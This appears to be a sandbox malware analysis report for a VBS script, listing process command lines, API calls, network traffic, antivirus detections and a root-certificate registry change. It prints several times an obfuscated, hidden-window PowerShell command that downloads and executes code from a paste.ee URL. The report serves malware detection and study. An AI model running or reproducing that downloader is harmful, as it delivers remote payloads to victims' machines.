cmdline	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 29, 2024, 5:03 p.m.	show_type: 0 filepath_r: Cmd.exe parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: Cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 29, 2024, 5:03 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (20 events)

Data received	[
Data received	Wf§LÚ(æïØÎ¨¾ÛöeÆÊõ£HaDOWNGRD =øºõVNÀPé^}8a;.Õ!Õ,~2ñÀ ÿ
Data received	Ò
Data received	Î Ë¡00B ú«>Þ9ÙdïÖ.¬0 HÎ=0;10 UUS10U Google Trust Services10 UWE10 240622144918Z 240920144917Z010Upaste.ee0Y0HÎ=HÎ=BA>Ó-z V/¥\ô]OàêÐé¡÷!f Ärq%þ.Mç7bíþKîç°¸µíÁÂzÑÐ\|O] ?£M0I0Uÿ0U%0 +0Uÿ00UBz~<"ñã6¸ri¸N bW{0U#0w5gÄÿ¨Ì©æ{Ùy{Ìù80^+R0P0'+0http://o.pki.goog/s/we1/rfo0%+0http://i.pki.goog/we1.crt0U0paste.ee .paste.ee0U 0 0g06U/0-0+ ) '%http://c.pki.goog/we1/t4Y_tS4oQ9A.crl0 +ÖyõòðußáVëª¯µq¨À2N®VÙn§õ¥jÑÁ;¾R\@£BÏF0D ;2Áj³,ÛÊø¢<U×+vªÇëÑäÇÝ1r¤%¤ "8} Ô\åIC¼PW:Äo¤Ñ×ìãæwvÿ? ¶ûQÂaÌõº4´¤Í»)ÜhB ægLZ:t@£B3H0F!çSaÔ)),}8b?7îk&æõÑõ÷!þµ¦1 ¨¾ yÞ²ªZx¦$h]ÞvG0 HÎ=I0F!ÄsHv¬NÀ°ú@àO/Ø\ÜÜÞstÝíV!àMv$ å,´X¡P·ÐïÿB±õ0ôjeK£00% ów,"Jv]¶Öã0 HÎ=0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R40 231213090000Z 290220140000Z0;10 UUS10U Google Trust Services10 UWE10Y0HÎ=HÎ=BoÍ:þgWGL!@ÂG]»XG@Á\Æ7çÕ\|íKÙ×¥ øÄÆèÿY,&õæ&%»úV£þ0û0Uÿ0U%0++0Uÿ0ÿ0Uw5gÄÿ¨Ì©æ{Ùy{Ìù80U#0LÖëtÿI6£ÕØüµ>Åjð04+(0&0$+0http://i.pki.goog/r4.crt0+U$0"0 http://c.pki.goog/r/r4.crl0U 0 0g0 HÎ=h0e1ç«QÖ÷CÎuþÑÕÌ@Az&¾Øó2-=®#HR>dy¯õ¦,nU±0&Ìhbç«~èÖD~ãLI¿lb4¸²¡~:P¼§ }sìRAMîâV~0z0b å0¿3C¾ÝI=0 H÷ 0W10 UBE10U GlobalSign nv-sa10URoot CA10UGlobalSign Root CA0 231115034321Z 280128000042Z0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R40v0HÎ=+"bóts§h`®C¸5Å0{KIûÁaÎæÞF½kÕa5®@Ýs÷0Zë<î\|¢@v;©Æ¸GØçjsé±r9)¢Ó_^Xe¡eÑÜÉÇsÈj/åÄ«Ñ£ÿ0ü0Uÿ0U%0++0Uÿ0ÿ0ULÖëtÿI6£ÕØüµ>Åjð0U#0`{fE ÊP/}Í4¨ÿüýK06+0(0&+0http://i.pki.goog/gsr1.crt0-U&0$0" http://c.pki.goog/r/gsr1.crl0U 0 0g0 H÷ B»Öã?c ¤¡hH9"søËN-1éç ¡Ò6¬yëé°ëj¶{}t¸e«h,,ÝBýÆqÏ-÷kÈn}Vâ#XXù%ºG× ý ¶à.®UÑyu5,1[?e¼ÍB§±^ñ»Ê-Gð¬c~¿ÖäkÓÖÓgX¸ÿ÷¦ IP[?:%ò\ÓyW6Îÿ&·©ñí>ÈnëÓ<8ÀAá^SÏ> Wëîâ?H¥ñ¾Ñj#û?/¢µ½ên£FÎ.g¯3&ªÕKÒ©6Å&;[Áå
Data received
Data received	Au©Â'w¼ÖPÈ¶Áà~í)ß£`/l °¦Ü\|©áññàaXú§gW?â?PÌYð ,J¯®G0E!Õ¼j_\á£hwH5vçÃÌ¤¸J,¹.3mÞ~õ >ÑFuÈ ©ÅÚÎþFKÁôº¦YUÀ^¬"Ý
Data received
Data received
Data received
Data received
Data received	0
Data received	EðFø²-8Ê¨èÇºö¼O{î8A³NÁÃ¯£hì,,céÔ
Data received	p
Data received	kØ$Na½WÓADÚÖÂýî@gsøpFæ4C1jIéï7r SÁ¤_°dW^Qì1¸{^ÊmÚÂÃEIí8h¬®t.£\|ûõÎë>U>èÙP#:Wq\Jw9L¦ËFA5çqþ`çi>R¡Fú¶GåZw¯¯qð¦àæÕò%½Ðjø¾âlAC{·)&¼r0×A-Êùçe¶®CÑöËH+jÒ'~h îÃØ°`ðr$úkøbaÍ\ôr¨/,svMõ õG+ô2EÙÕ7{wÒþ«ô6ýñ(eB@c¹¿Ô8ubeZF¬éµê~OÑã£gZ Íüì:FäðìUä2hJÀ5_y{û{'_ýÙo¤}lÉ,¡¯H\|®c±Ð6 f¼I èWþú2qmÎîò;Ys¹ÂwYFæøµº¡lË©»@÷¢ðg`ÏU8>iFØ²à³bÃ "mÔ÷4Ös,S¶ûpHdÆ:GÙ6zÞ÷'ðÛ´Oôbòg¶k/ù~)¢ö¹ÌéG`dt¾ð$y2×i:~¶Ë4"õÈs¥y1ºläé<i6>"n¬íQÒãJ)N+Ãº_gÜH£pd~h}¶Wôð¹p¯ÌÄ;ÒapåM?¤æØ.¤ÅÆ»¸>_mµ¿ë¶Y>uÄ³/ÞHGhHÃ"Ëj¶¢i¸ÁàñvúY)åó°Ë íAi³Q¼ÜÄþGrîs\ðSÍ8bFoû¸^iû³ÌZ-ÿÈnÔ`3)ç×eÖK'YÙaÞB_Hïçæd¤_©ÎÏ9lrÈ§j«£^WQWM¸þ¼.þä W_8÷SsçóA=¶{üóV`Ë/éÝaK{ `°ÂAkøþFlUnâo:pY~«Ø@Û°4ºþÚrÿ0CWìësÀW}@ÏYùð<)WÙäÇ_ßc¬4iR·é6£zÞAéDýYAmÉÜÉ¥Þ¹?)âËò$üD5#"#³:õ''GÔ}ï°¸æ?sHlkRr²·\ÝÍ[¬êÜ¹óÙ"¤XöÀ']¢åè(X¤eçÿ`ãSrb±l'¤'ëãÑ gcÈ.AåNhI<·¤´+ÐQ!2)ì áÕåÎ}>ÕTãÕàÂu2kßÔ<°´¥bäB§q¢úu)Ð2?é(tM"'ØÄ_î§kã÷k7rýÐÅ¼Ñ@¤åxC.°áõ¶¥º^ qÌ§éÍ¹pR¼ó ~Yù»9ÇÌqô»?Uqá4Ã¸Íµ0+Ý°Ê.b_0ª±ÕmE{ùÌ»I(áìÜGÈnÿ³eûDÏà:¹$ÊõB)ì°èoÔ twjX]Ð}²ª2Á@iòXõ$ÈÒjÖrv-dû¼j^Á5Eý j -Á¯ötÛ·8ÐÊ3MÉ¥Ëª«\û#åO½"ÑÖÙíÍz?¬ ÚìA¹P0ìEõSàvàìtR8µÐEåg>á·¡r ×½D0L9Ë"$~<*Ií@>?Õ 2°ÂÇö`V¿r6 ÿ <»ðµgåò¼G{Zì:Å×ÇM"è²»r×lv~2cÆ¿Ä
Data received	ØõÛ+·4Còø6!$+þg¼A$;eµ"jâõ$-XEq.¬ae(pg4Ya~LKGèùõ,Î.ÄøÑÛ¨fÝoúæNßÜÈ&[Ûí±jÂ½{¾AWeæ«Ój4Pc7ím&¡ªøÖñá9T£J[õ?ÓpXsË£ÂUXóÎO®@>º°bâ0'Ì.»gA£¢¥úäIññ¨Y5_ÖEëÈY1 _ùO·[ÉuÑáKÃ5®V{ºþ©ÙØñÎÇ©°q^ô?+ìæ¿{;C¨rÙu¯MÓÇ×SýÁ¶uóagÚzK>G8{¿þPEvßvtZ§,`Á¡>P¥s/ÃpÝF,¨S ¦/Ç0Ï¼´*6ÌKÊ1,MönrD¥ØFÕa°öuÝTÜªÞQr¾M®pS×ìqTuª[¢gÃÌVéRÃDkmI ¿,¢]¤Lù©ÞCDGëµ3D9.?øJ¸÷ )åTæþ"ã_VJüØÈ3Û·ÅT#4á$úoZ°þzqáAÉpH=\|ª)P[= ëúÆLÜcü¯ûô$J ôP\PO²Âi[fç÷w«ø0·yí?½Ëú±zM<ýD¿`UYWbétWf³Åë\déúVÙ8«ö6²Ò99s[3±>%5Ç^¡`Ýg8¿· Á}5càLÏÕÜlú&×óÃÈ&!eðºÄiËa/Þæ©iK6«J¦á÷Ïbé29UAcì(üÐ{È#g»ÑÅR½ÑãtðRî²óöº5·xð)÷¸Zr3CõjÍb#%öþHþµÁæNÖ°bÿ®G÷\±8ÇhG]^¥Y&°_§LøÈËHEâ#þR{ýÎoGÆbV®¿5¸ç"1ó¦=z.§í ò+×@Þ/Å]Ãèå«\nü¿w©cyC\C£KÔ5¡2ò\/A0¦lËèLIXKBûbö%üyM'EZ¸pOòd l£E¸eXûÿOñ·©%ó7Z? 8{ýÂê2ª8Sç qbägáÎ°)§Ã^K}ÂUv½aÊÔ)Ó »æìÇÞ®_}4Ò3ém¥6æ¢:jù©\|AEÈ Ì5rÄ8©·.j ÃÙT!¯ï$yax'ä~k-uÑ³ð, »ôúüã©FäÙÝ._inBbÓèo¼« Æjë4#}wÂÚg#AÊlÌyÀ åðú]Xh!ÎîÆÐÁ%kÿìÆÍ)RfÏçÃ&Ã1¯=A#:ôõEÉ¦k¨(ø]âþrYÌ×û¹ó=µ(QÙ bl¥&_DÈ¦Àd²@5×F®T×ÃZj¿¨E³NQMR^\ªßé÷qí\ñ\|wéÂÚì>ô=ËZÓJð¨Cy½[J:4 ¹êEAsÆÝrÖEÊýÂlß©×7Qû¤ó_t{8\)$\|[7 í¾óêì70¨ÉZpK±RùÛ÷©FZ±y¯/Dcy¦°Ö)tæBc=álwÝUÓV[ðXÙäRï~-©ItpøN¢æ#sdÑ~ n¸ÁMvw#Û\Ô©ì^Pdk-ÛúùÛ$}M¢ªm³Dûiª$g~ñï
Data received	ÈMò$o¢V¤¹Ó¡@ÿ]æß$k×Ò±5kµÌ$Æ}ö:UÏ³j¢~nm8¯ÆdwÅ6Ü^¬jeQ>pÅ%ÓÆ::u]4^º³ý±ìCä¿bB;ûs©mÉn±ýV;Ë$n[Þ·ÔÕõØ:xõÄAAqÃOÚ>à/Ñ8]@7ª´ÐcN§ðDrUìUIrÐ/};')è? D1n¹»PólÈ®h`d»ç_ð~öNdí¨Q¦Ï{ºÚñù?IéPAÁ×ÝA©E¼ 6¿Ës!¿Ñ½FÈïôµTðéYgßFuz´¤wÁgóÞWIÜ(i/(½ÓÊõS]4ÅFa ÒúDoÊ~í<ÄW¸Aµ~QÃûeøýç©Rz ÆiÃTf^JB{Ôcª¸&Á`jÉXsæñsoc¡àZFÏïKf697pÇ,\éCcÚ'ì+ûWMÁ0GW#æ$o,8óZ¬½Ü%\ÍúAËòîãÁ` ÿ1µ)<ê½êWW k8kÎÙÝ9"t\|d Fâ~q#çð5Ä£MkÔ-[ ¡9½ÉÚÅ^C^×X¡3Å-Nîsû_[Ce "Ì6oà¤óýjÉq1êÊë0Èe"&NêæíV7Êf{ç¤ª+@añ¶iò7©¤OoMhÏ¼ßDeÑ©h. AèØ¤ôH[Ä~ÇèÀSÐ2ÖzÛKvNq\4¶MóQOò´éT_°Oz.ä"¼¬ÅP÷°cÙnR«ûø¢ÚÔüóÊxFØ£\°or~$gÞ´º×]l6½¾nÒÂ¨òQü"¢ñÝwnÙ6©$M kÊµµ·¶¸""1ìWlÿßPVýÇíL!EòWÔQÇè-4\|ßÙ4K1)7õ§ FZG&>½b¤rv1sÍ)Ó.<)ñ´?í$d³qç[ ?§ÄoÒj¾Ü«iG<lUIÈéá\|üq oXfÞ¿<áY]õw +ÇK,jLt§Â1svRîÌD-o£ñ×/"Y¤2ÎøìYºkÄUù §6ox3Òî¸c<¥LÙÖõ¼©ªRaÛx?uÌÓæ°3ApCV¥ ÏÍ;¶Ò}ûe$ð=JE"û¥¡ÝÈ¨êöò)ÄÓes(ÿKÍ®xÚÈý ¿§FsÈ.^zçBíÁkÂÅ÷öù2¢bÌj×ÁÿÝ´»äáu]Ú ÿÙÃö¸«U¦¥}g»hG®Nø£öc½GÑ ±# Ñý/ÜéÈ¬ïl}d:?ÅoH·8X_>ñ¯õxIÕ¢7&&N¢ù¦P 8gÌÍÝj4 LÃçIú¬Ð4Û6?² qY¿Y¨Rlù·:ôD§4±I¶¢'[3W§ pN]öîÍ$ÞJ~G²û«$Ëtñ`bOhéÇ7àØÒ¢2÷TÉl=%÷ö¨(vÈ>9[ãZyn976@£Ø¹Pux!ÉZíÐQvÍ®9HÙuÛ`$X+_uTPÙj c£ÑªÕºâ0Ð¦B6mßJ`k¨°üÖ@>.Ø2>2%¼>£MFçj~g¶©{ÿm?mÑVÄyskÍ0æ8¬Åý£F?á+nÁ
Data received
Data received	õ×Ù¨f-«Á9ÞpwÜJsëmOòºA×ÐÉãVn çeò_knxÈ41ÅYå²çúxãå/ô¼È+mq2ÊkØñ ¯ÿOEzè§:üòaåj+§uýF>Ç ±àËö9ê?Óó-(eRk8×{"ÿ´qf7ÑZûÝéâììsEz)PÆ-¡¹oã_µ,&â´´2{kçÑ:êª.ÒxÅ#Ô[¨&ýÜ¾Òú9 _vJt2Áeï'²yCäíõTàuúÚÍ zï?VÍtÎÐ¶äõ¹í¤S¤TÈ¿qÐz}ê$¸$¨t`ëX%ü5¡æ¸¢K¢Än´VJ?¦Óßfõ«káÓÛÜ< ÇÑJ[®=Ö¹âE°×ñ¹ÖnÇà<¢¤¢&?ÑÃ W@ÏçèS;Q×Tn,k«}¤²Pâ+ûXíwGE¹ú°DiÜ{üôÄX@Àbx6ãtóU¯;fÇWM}H]¾^WRLß ¹Þ%8¥gAy¾h>U=y®íÌÚÁn÷ÐüerÍÎ¬øcÿSø.«¹ æÖ¼jh°<\/ØØ=³þìô÷^º2º¾ØbØ£õØZq½Ã"fúþÇò¨½{=çT«áüOåâ¼Ô<{'ÔRIÁ«{ïîñüÌOOfºâÉæ²7·w4Ré¦«wôXÃANä&S ¦7½É ½ð_Ð¤lXUHEàê¨-8¿Ò7 5Z:`Þ¸DNZ6ÏpÆ¸þïJþ&ê©jbztÃ#e½Zmm{,¦»ì`!¬ýÎ,\|;Ç Äóö±o¥#¿R^{9¿5ûéþÌÑã¢¼0À²ïïiAR/ö²~¦ûLwà!ÅÄíÊw=ßÖ'¢È~y)¤!¤L¤ñmRn òjÅâµUö~wmóõ@áüØü¿@Û<Ýº$áÇ]ü»'¥, ¸öFb ïçQ].Ë> ¡á¡[³eÃ>ÊºÝ2fVY¹vF®hT:Nß U³,ãcZÚ0æßK"çpP§
Data received
Data received	Krç¹Õ»Z2ãzçëÄ0éñ WòÊ^wé

Poweshell is sending data to a remote host (3 events)

Data sent	kgf§LÒo#ú&Öä·Gäh®íÉ»¨ß 9¿¶U/5 ÀÀÀ À 28&ÿ paste.ee
Data sent	FBA**ÌæßîâO¦µz.!QÙRØ]D!ÏÍºÐ}+à6Ä¥lA/ãY¦}sÍ~ÆðL²Pïo0ÀPÀ~Fn/âìDE/7 G¡:7úúçC¸9{7ã3_éWî
Data sent	`ÅCöôTcwW'6Ó¦HäußPå«©¬ÓGkbË~¿ëÌCÃ8ò%ÿ?ô´Ðb%>ClRTRtå«Væa_Ñ³%/?¾åçRñûnÁvN×ÌzìàQ®ÃB÷ñp

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 29, 2024, 5:03 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

File has been identified by 12 AntiVirus engines on VirusTotal as malicious (12 events)

Symantec	ISB.Downloader!gen80
ESET-NOD32	PowerShell/Runner.A suspicious
Avast	Script:SNH-gen [PUP]
Kaspersky	HEUR:Trojan.VBS.Alien.gen
Rising	PUF.Runner/PS!8.188C4 (TOPIS:E0:V57SxEang5G)
Ikarus	Trojan.PowerShell.Agent
Google	Detected
Microsoft	Trojan:VBS/Obfuse.RTDF!MTB
ZoneAlarm	HEUR:Trojan.VBS.Alien.gen
Varist	VBS/Agent.BOL!Eldorado
huorong	TrojanDownloader/PS.NetLoader.fk
AVG	Script:SNH-gen [PUP]

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send July 29, 2024, 5:03 p.m.	buffer: kgf§LÒo#ú&Öä·Gäh®íÉ»¨ß 9¿¶U/5 ÀÀÀ À 28&ÿ paste.ee socket: 1424 sent: 112	1	112
send July 29, 2024, 5:03 p.m.	buffer: FBA**ÌæßîâO¦µz.!QÙRØ]D!ÏÍºÐ}+à6Ä¥lA/ãY¦}sÍ~ÆðL²Pïo0ÀPÀ~Fn/âìDE/7 G¡:7úúçC¸9{7ã3_éWî socket: 1424 sent: 134	1	134
send July 29, 2024, 5:03 p.m.	buffer: `ÅCöôTcwW'6Ó¦HäußPå«©¬ÓGkbË~¿ëÌCÃ8ò%ÿ?ô´Ðb%>ClRTRtå«Væa_Ñ³%/?¾åçRñûnÁvN×ÌzìàQ®ÃB÷ñp socket: 1424 sent: 101	1	101

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/Cyxef/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (12 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe

vnm2.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All